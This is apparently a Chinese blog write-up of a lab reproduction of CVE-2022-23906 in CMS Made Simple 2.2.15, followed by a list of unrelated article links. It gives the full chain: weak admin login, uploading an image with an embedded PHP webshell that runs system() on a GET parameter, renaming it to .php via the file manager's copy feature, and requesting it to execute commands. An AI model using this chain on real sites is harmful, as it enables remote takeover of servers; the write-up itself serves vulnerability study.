当前位置: 首页 > article >正文

CMS Made Simple v2.2.15远程命令执行漏洞(CVE-2022-23906)

漏洞简介:

CMS Made Simple v2.2.15 被发现包含通过上传图片功能的远程命令执行 (RCE) 漏洞。此漏洞通过精心制作的图像文件被利用。

漏洞环境:

春秋云镜中的漏洞靶标,CVE编号为CVE-2022-23906

漏洞复现

后台/admin弱口令登录 admin/123456

文件管理这里可以上传文件

先上传一个php文件发现无法上传

发现可以更改文件名

修改文件名后缀为php失败

图片马可以上传,但是没法利用

<?php
system($_GET[777]);phpinfo();
?>

再试试copy复制文件

复制图片马,修改后缀为.php

直接访问/uploads/yjh.php去执行命令


http://www.kler.cn/a/567892.html

相关文章:

  • 20250301_代码笔记_函数class CVRPEnv: def step(self, selected)
  • 文件描述符与重定向
  • ES批量查询
  • 大模型训练——pycharm连接实验室服务器
  • Python中文自然语言处理库SnowNLP
  • 多通道数据采集和信号生成的模块化仪器如何重构飞机电子可靠性测试体系?
  • 数据结构之各类排序算法代码及其详解
  • 判断按键盘是否好使的开机自启动PowerShell脚本
  • 【MATLAB例程】三维下的IMM(交互式多模型),模型使用CV(匀速)和CA(匀加速)
  • UWB人员定位:精准、高效、安全的智能管理解决方案
  • 使用3090显卡部署Wan2.1生成视频
  • 基于ai技术的视频生成工具
  • Java——String
  • 计算机网络之传输层(传输层提供的服务)
  • DeepSeek 开源狂欢周(五)正式收官|3FS并行文件系统榨干SSD
  • 【漫话机器学习系列】111.指数之和的对数(Log-Sum-Exp)
  • Flink同步数据mysql到doris问题合集
  • Ubuntu 下 nginx-1.24.0 源码分析 - ngx_init_cycle 函数 - 详解(5)
  • vue3-print-nb的使用,点击回调
  • 《深度揭秘:生成对抗网络如何重塑遥感图像分析精度》